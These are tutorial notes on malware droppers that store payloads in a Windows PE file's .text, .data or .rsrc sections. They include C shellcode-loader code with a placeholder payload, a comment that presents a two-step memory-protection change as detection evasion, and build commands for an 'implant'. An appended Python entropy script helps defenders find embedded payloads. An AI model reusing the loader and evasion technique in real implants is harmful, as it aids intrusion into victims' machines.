Payload Storage

Droppers

Special programs used to deliver the payload to the target machine.

For example, during a phishing attack your code is executed on the target machine. This executed code is the dropper. It can be a simple program or a complex one, but its final goal is to deliver the main payload to the machine and execute it.

Where to store the payload?

Payloads can be stored in PE sections. The most commonly used are:

  • .text
  • .data
  • .rsrc

Text

Code

The payload is placed inside the code of a function (main, for example), so it ends up in the .text section.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {

    void * exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;

    // 4 byte payload, declared as a local array inside the function
    unsigned char payload[] = {
        0x90,        // NOP
        0x90,        // NOP
        0xcc,        // INT3 : hand control to the debugger
        0xc3         // RET
    };
    unsigned int payload_len = 4;

    // Allocate a read/write memory buffer for the payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (exec_mem == NULL) {
        return 1;
    }
    printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
    printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);

    // Copy the payload into the new buffer
    RtlMoveMemory(exec_mem, payload, payload_len);

    // Make the new buffer executable
    // This is not done during the first allocation because a region that is RWX at once looks suspicious.
    // Doing it in two steps allows basic evasion.
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

    printf("\nHit me!\n");
    getchar();

    // If all went well, run the payload in a new thread
    if ( rv != 0 ) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
        WaitForSingleObject(th, INFINITE);
    }

    return 0;
}

Compile

@ECHO OFF

cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64

Data

Code

Tell the compiler that the payload is read-only data. The simplest way to do that is to declare a global variable holding the payload.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// The payload is not declared inside the function body but as a global variable, so it is placed in the .data section at link time

int main(void) {

    [...]
}

Compile

@ECHO OFF

cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64

Rsrc

Code

It is a dedicated section for storing other files (resources).

So, create a file containing the payload and tell the compiler that this file must be part of the .rsrc section.

Then the code has to use a specific API to reach the .rsrc section and extract the payload from it.

#include <windows.h>
#include <stdio.h>

// FAVICON_ICO is the resource ID given to the payload file in resources.rc;
// it must be defined before this file is compiled so that it matches the resource script.

int main(void) {
    HGLOBAL resHandle = NULL;
    HRSRC res;

    unsigned char * payload;
    unsigned int payload_len;

    // Extract the payload from the resources section
    // FindResource asks the system to locate the resource (FAVICON_ICO) in the PE file
    // It returns a handle to a resource info block
    res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);
    if (res == NULL) {
        return 1;
    }

    // Use the resource info block handle to get a handle to the resource data
    resHandle = LoadResource(NULL, res);

    // Return a pointer to the first byte of the resource
    payload = (unsigned char *) LockResource(resHandle);

    // Return the size of the resource in bytes
    payload_len = SizeofResource(NULL, res);

    printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);
    printf("%-20s : %u\n", "payload len", payload_len);

    return 0;
}

Compile

@ECHO OFF

Rem resources.rc links the type of data (RCDATA) to the file containing the data
Rem rc is the resource compiler and takes the resource script as argument
rc resources.rc

Rem cvtres converts the compiled resource file into an object file that can be understood by the C compiler
cvtres /MACHINE:x64 /OUT:resources.o resources.res

Rem The compilation includes the resource object file
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
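As an added example that is not part of these notes, here is a small defender-side triage script in Python: it parses a PE section table and measures per-section entropy, which is the check an analyst runs to spot a payload stored in .text, .data or .rsrc as described in the three sections above. The sample PE bytes are constructed inline for the demonstration, and the 7.0 bits-per-byte threshold is an assumption.

```python
import math
import struct

# Section characteristic flags from winnt.h
IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x20, 0x40
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 0 for a NOP sled, 8.0 for a uniformly distributed (encrypted or packed) blob."""
    n = len(data)
    return -sum(data.count(b) / n * math.log2(data.count(b) / n) for b in set(data)) if n else 0.0

def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table (one 40-byte entry per section)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0] if len(pe) >= 0x40 else 0
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsect, opt_size = struct.unpack_from("<H", pe, coff + 2)[0], struct.unpack_from("<H", pe, coff + 16)[0]
    sections = []
    for i in range(nsect):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, 4 reloc/line fields, Characteristics
        name, _, _, rsize, raw, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", pe, coff + 20 + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "characteristics": chars,
                         "entropy": shannon_entropy(pe[raw:raw + rsize])})
    return sections

def triage(pe: bytes, threshold: float = 7.0) -> list:
    """Report sections whose bytes look encrypted or packed, wherever the dropper chose to store them."""
    return [f"{s['name']}: entropy {s['entropy']:.2f}, possible embedded payload"
            for s in parse_sections(pe) if s["entropy"] >= threshold]

def build_sample_pe(sections: list) -> bytes:
    """Constructed minimal PE (no optional header) used only as test input; it is not a loadable image."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0x22)
    table, bodies, raw = b"", b"", len(dos) + len(coff) + 40 * len(sections)
    for name, chars, body in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(body), 0x1000, len(body), raw, 0, 0, 0, 0, chars)
        bodies, raw = bodies + body, raw + len(body)
    return dos + coff + table + bodies

# Constructed sample: NOP/RET code in .text, a uniformly distributed blob in .data (what an encrypted
# payload looks like) and a plain RCDATA resource in .rsrc.
SAMPLE_PE = build_sample_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\x90" * 63 + b"\xc3"),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, bytes(range(256)) * 4),
    (b".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, b"RT_RCDATA sample resource " * 8),
])
```

Run `triage(open(path, "rb").read())` on a real binary to list the sections worth a closer look; a plain-text resource or normal compiled code sits well below the threshold, while an encrypted blob in .data or .rsrc lands near 8.0.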
